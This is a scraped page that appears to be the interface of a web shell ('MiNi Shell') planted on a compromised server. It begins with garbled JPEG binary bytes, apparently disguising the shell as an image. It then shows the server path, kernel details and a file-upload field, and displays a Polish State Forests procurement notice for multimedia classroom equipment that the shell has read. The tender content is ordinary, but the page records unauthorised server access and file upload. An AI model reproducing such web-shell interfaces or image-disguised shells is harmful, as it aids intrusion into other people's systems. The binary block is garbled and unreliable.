JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220218/0006191001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostosowanie sali w Ośrodku Edukacji Przyrodniczo-Leśnej w RDLP w Katowicach do prowadzenia interaktywnych, multimedialnych zajęć edukacyjnych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE LASY PAŃSTWOWE REGIONALNA DYREKCJA LASÓW PAŃSTWOWYCH W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272537539</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Huberta 43/45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-543</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie sali w Ośrodku Edukacji Przyrodniczo-Leśnej w RDLP w Katowicach do prowadzenia interaktywnych, multimedialnych zajęć edukacyjnych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-887d7920-908f-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00061910</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/profile/6340257913 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Osobą uprawnioną przez Zamawiającego do porozumiewania się z Wykonawcami jest:<br/>W zakresie postępowania przetargowego: - Dawid Pasternak<br/>E-mail: sekretariat@katowice.lasy.gov.pl<br/>w godzinach pracy: od poniedziałku do piątku godz. 8.00 – 14.00.<br/>W zakresie opisu przedmiotu zamówienia: - Anna Tarkowska<br/>E-mail: sekretariat@katowice.lasy.gov.pl<br/>w godzinach pracy: od poniedziałku do piątku godz. 8.00 – 14.00.<br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy https://josephine.proebiz.com/pl oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy https://josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy na<br/>stronie internetowej https://josephine.proebiz.com/pl<br/>Oferta może zostać złożona wyłącznie przy użyciu platformy<br/>https://josephine.proebiz.com/pl<br/>Zamawiający określa niezbędne wymagania techniczne umożliwiające pracę na platformie<br/>https://josephine.proebiz.com/pl. Wymagania techniczne znajdują się w stopce ekranu<br/>głównego oprogramowania JOSEPHINE po kliknięciu w słowo Wsparcie<br/>https://josephine.proebiz.com/pl/support<br/>Ofertę oraz oświadczenie o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>Złożenie oferty:<br/>Wykonawca po zalogowaniu się za pomocą hasła składa ofertę i dokumenty za<br/>pośrednictwem swojego profilu dostępnego na platformie<br/>https://josephine.proebiz.com/pl. Użytkownik wykonawcy składa ofertę i wymagane<br/>dokumenty jako załączniki w postaci elektronicznej opatrzone kwalifikowanym<br/>podpisem elektronicznym. podpisem zaufanym lub podpisem osobistym. <br/> Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci<br/>elektronicznej w formacie danych w szczególności: *.pdf, *.doc, *.odt, *.rtf i podpisana kwalifikowanym<br/>podpisem elektronicznym. podpisem zaufanym lub podpisem osobistym. <br/>Do oferty należy dołączyć oświadczenie o którym mowa w art. 125 ust. 1 PZP w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym a następnie wraz z plikami stanowiącymi ofertę<br/>zaleca się skompresować do jednego pliku archiwum (ZIP).<br/>W postępowaniu o udzielenie niniejszego zamówienia komunikacja pomiędzy<br/>Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków<br/>(innych niż wskazanych w pkt 10.7 SWZ) zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego<br/>na platformie https://josephine.proebiz.com/pl We wszelkiej korespondencji<br/>związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia opublikowanego w BZP lub numerem postępowania wskazanym<br/>w SWZ.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, email sekretariat@katowice.lasy.gov.pl<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub<br/>oświadczeń składane są przez Wykonawcę za pośrednictwem platformy<br/>https://josephine.proebiz.com/pl jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty<br/>elektronicznej, na wskazany adres email.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz.<br/>Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem<br/>danych osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Regionalna<br/>Dyrekcja Lasów Państwowych w Katowicach.<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do<br/>upływu terminu do ich wniesienia.<br/> Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/> Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP<br/>– w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o przepisy PZP.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy w sprawie zamówienia publicznego.<br/>Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu<br/>przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze,<br/>w tym usługi prawne i konsultingowe.<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane<br/>w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania<br/>dane osobowe, ma prawo:<br/>dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w<br/>sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO<br/>wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności<br/>podania nazwy lub daty bieżącego bądź zakończonego postępowania o udzielenie<br/>zamówienia publicznego;<br/>do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym<br/>skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o<br/>którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z<br/>uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego;<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku<br/>uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych<br/>osobowych, w tym przepisy RODO.<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e<br/>RODO;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/>osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych<br/>lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących<br/>zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej,<br/>w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.<br/>Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu<br/>administratora danych osobowych.<br/>Polityka prywatności Zamawiającego – Polityka Przetwarzania Danych Osobowych<br/>Regionalnej Dyrekcji Lasów Państwowych w Katowicach jest do pobrania na jej stronie<br/>internetowej Biuletynu Informacji Publicznej pod adresem:<br/>https://www.gov.pl/web/regionalna-dyrekcja-lasow-panstwowych-wkatowicach/polityka-prywatnosci</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR.270.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu multimedialnego wraz z instalacją,<br/>montażem, wyposażeniem i oprogramowaniem oraz strategiczna gra leśna, niezbędnymi do<br/>realizacji projektu pn.: Dostosowanie Sali w Ośrodku Edukacji Przyrodniczo-Leśnej w RDLP<br/>w Katowicach do prowadzenia interaktywnych, multimedialnych zajęć edukacyjnych.<br/>Zakres dostawy:<br/>zakup, dostawa z montażem i podłączeniem, oprogramowaniem, uruchomieniem i<br/>pierwszą konfiguracją urządzeń multimedialnych wewnętrznych wraz ze sterowaniem.<br/>Wykonawca będzie odpowiedzialny za położenie instalacji w zakresie objętych<br/>zamówieniem urządzeń oraz właściwe połączenie ich z pomieszczeniem serwerowni,<br/>system multimedialny oraz nagłośnienie i oświetlenie wraz ze sterowaniem niezbędnym<br/>do realizacji projekcji i gier strategicznych. Sprzęt ma być sprzężony z odpowiednim<br/>oprogramowaniem;<br/>stworzenie aplikacji strategicznej gry leśnej (kontentu multimedialnego zawierającego<br/>treść, grafikę i oprogramowanie), w tym: konsultacje merytoryczne dotyczące<br/>przedstawianych treści i ich formy, sporządzenie dokładnego scenariusza gry<br/>strategicznej do akceptacji przez Zamawiającego, pozyskanie materiałów źródłowych<br/>oraz licencjonowanych;<br/>montaż wszystkich instalacji i urządzeń;<br/>przeprowadzenie szkolenia z zakresu obsługi sprzętu i urządzeń, oprogramowania i<br/>aplikacji multimedialnych;<br/>.zapewnienie gwarancji;<br/>oznakowanie zgodnie z instrukcjami Wojewódzkiego Funduszu Ochrony Środowiska i<br/>Gospodarki Wodnej w Katowicach opublikowanymi na stronie:<br/>https://www.wfosigw.katowice.pl/files/zasady_oznakowania_przedsiewziec.pdf<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30230000-0 - Sprzęt związany z komputerami</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30237200-1 - Akcesoria komputerowe</p> <p class="mb-0">38652120-7 - Projektory wideo</p> <p class="mb-0">48218000-9 - Pakiety oprogramowania zarządzającego licencjami</p> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy wyborze oferty Zamawiający będzie się kierował następującym kryterium oceny<br/>ofert:<br/>16.1.1. Cena – 60 %,<br/>16.1.2. Próbka kontentu multimedialnego zamówienia – 30 %,<br/>16.1.3. Okres gwarancji – 10 %,<br/>16.2. Sposób obliczania punktów:<br/>16.2.1. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu<br/>wzoru:<br/>C=Cn/Co*100 pkt. * 60%<br/>gdzie:<br/>C - liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w Ofercie<br/><br/>16.2.2. W ramach kryterium „Próbka kontentu multimedialnego” ocenie będzie podlegać zgodność zawartości merytorycznej i graficznej próbki kontentu multimedialnego zamówienia w postaci scenariusza i próbek layout’u z wymaganiami rozdziału 3.10 SWZ, w następujący sposób:<br/>P=(S1+S2+S3)*30%<br/>gdzie:<br/>P – liczba punktów uzyskanych w ramach kryterium „Próbka kontentu<br/>multimedialnego”<br/>S1+S2+S3 – suma punktów uzyskanych w poszczególnych subkryteriach kryterium „Próbka kontentu multimedialnego”.<br/>16.2.2.1. Subkryterium 1 - zgodności merytorycznej próbki kontentu multimedialnego (scenariusz i lauout) z definicją gospodarki leśnej i trwale zrównoważonej gospodarki leśnej zawartej w ustawie z dnia 28 września 1991 r. o lasach (t.j. Dz.U. 2021 r. poz. 1275, 1718) opisanymi bliżej w rozdziale 3.9 niniejszej SWZ, ustalona w następujący sposób:<br/>S1=50 pkt. * WS1<br/>gdzie:<br/>S1 – liczba punktów uzyskanych w ramach subkryterium 1<br/>WS1 – współczynnik zgodności ustalony wg. wyznaczników opisanych w<br/>tabeli w pkt. 16.2.2.1. SWZ.<br/><br/>16.2.2.2. Subkryterium 2 - zgodności scenariusza próbki kontentu multimedialnego z menu kontekstowym modułu SGL „Lasy – narodowy skarb” oraz powiązań funkcjonalnych tematów opisanych w rozdziale 2.10 niniejszej SWZ.<br/>S2=20 pkt. *WS2<br/>gdzie:<br/>S2 – liczba punktów uzyskanych w ramach subkryterium 2<br/>WS2 – współczynnik zgodności ustalony wg. wyznaczników opisanych w<br/> tabeli w pkt.16.2.2.2. SWZ.<br/><br/>16.2.2.3. Subkryterium 3 - oceny próbek layout’u kontentu multimedialnego pod kątem atrakcyjności opracowania graficznego.<br/>S3=30 pkt. *WS3<br/>gdzie:<br/>S3 – liczba punktów uzyskanych w ramach subkryterium 2<br/>WS3 – współczynnik zgodności ustalony wg. wyznaczników opisanych w<br/>tabeli w pkt. 16.2.2.3. SWZ.<br/><br/>W krytetium „Próbka kontentu multimedialnego zamówienia” Wykonawca może otrzymać<br/>max. 30 pkt. W przypadku niezłożenia, wraz z formularzem ofertowym, próbki kontentu multimedialnego, Wykonawca w niniejszym kryterium otrzyma 0 pkt.<br/>16.2.3. Sposób obliczania punktów dla kryterium gwarancji:<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie<br/>kryterium gwarancji - 10 pkt.<br/>Gwarancja w miesiącach Liczba punktów<br/>24 miesiące 0 pkt.<br/>25- 48 miesięcy 5 pkt.<br/>49-59 miesięcy 7,5 pkt.<br/>60 miesięcy 10 pkt.<br/>Kryterium gwarancji jakości na całość zamówienia będzie rozpatrywane na podstawie<br/>zadeklarowanego w formularzu ofertowym okresu gwarancji jakości.<br/>Najdłuższy możliwy okres gwarancji jaki będzie uwzględniany przy ocenie oferty to<br/>okres 60 miesięcy.<br/>Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach tj. np.:<br/>24, 37,….,49 miesięcy. Jeżeli wykonawca wpisze okres gwarancji krótszy niż 24<br/>miesiące to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty.<br/>OPISY KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE<br/>OFERTY WRAZ Z PODANIEM WAG TYCH KRYTERIÓW ORAZ SPOSOBU OCENY OFERT został opisany szczegółowo w pkt. 16 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: 